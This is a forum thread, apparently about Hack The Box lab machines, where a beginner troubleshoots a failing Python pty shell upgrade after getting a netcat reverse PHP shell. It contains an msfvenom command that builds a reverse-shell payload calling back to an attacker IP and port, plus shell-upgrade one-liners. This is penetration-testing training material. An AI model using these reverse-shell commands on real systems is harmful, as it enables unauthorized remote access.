Python pty.spawn not working

I’m at the point where I have a reverse php shell using netcat, and when I try to spawn a shell using “python -c import pty; pty.spawn(’/bin/bash’);” my shell does not spawn. The shell either becomes unresponsive or just nothing happens and I’m left with the defaul shell. I know this should work on this machine and that this is exactly when/where others have run the same command successfully. I am newer to pentesting so is there another reason that this may not be working correctly? thanks

check if python is actually present, or if python3 is. accordingly run that command

Also it should be

python -c ‘import pty; pty.spawn("/bin/sh")’

Im positive that it’s present. Just my command doesn’t work when I am literally watching an IppSec video where his does

Well he’s using /bin/bash, but I did try both, same result unfortunately

@JWindy92 your command above was incorrect format. see @thesithlord 's above. quotes are very important.

Well, I’ve tried the single and double quotes in both orientations, and that was a typo in the post, but in my console I was not missing the second quotation around /bin/bash.

I’ve edited the original

@JWindy92 said:

I’ve edited the original

Your edited one still has a typo.

Can you check you’ve run python -c 'import pty; pty.spawn("/bin/sh")' - note single quote after the -c and double quotes around /bin/bash?

Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn’t exit necessarily, just seems to kind of hang

Ok - that is a little bit odd.

For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you’ve done is run python -c import pty and then tried to issue a python command to the shell interpreter.

However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn’t always work (I find “shell upgrades” break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

Try it with a bash shell to see if that makes a difference.

I was using a bash shell, but I tried both for the sake of being thorough. I’m not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn’t working and I wanted to double check that I wasn’t doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesnt. So I’m just at a loss.

Again I’m new, this is the msfvenom command I’m using,
msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

any red flags there?

EDIT: I guess I should mention the .htb extention is being run as .php by the server. Not sure if you would know/remember that if you maybe haven’t done the box before or in a while since you’re more advanced than I am

What is the machine?

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

@TazWake said:
What is the machine?

I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn("/bin/sh")’

Type your comment> @6uta said:

(Quote)
I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn("/bin/sh")’

Hey. The command is right.
Try socat interactive shell, if python/python3 is not present.
But I’m sure your command is right.

What response exactly you get after executing python pty script?

Type your comment> @zaicurity said:

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit: it’s confusing that it’s like a shell but not really and if you get used to it: on any half decent windows machine the av will pick it up and throw you out.
Never even thought of using it. I just don’t like to use stuff that I don’t know what it’s doing exactly… The benefits I know of don’t compare to all the downsides I experienced with it.

That being said: @6uta, you generated a meter prefer payload, and you try to upgrade that session to one with auto complete. That it?

Not sure if meterprefer can. My suggestion would be to stay away from meter prefer sessions whenever you have a choice.

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn("/bin/sh")’

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

@gnothiseauton

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit:

I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any linux box as far as I know. It won’t give you tab complete or command history, though.

@TazWake agreed man.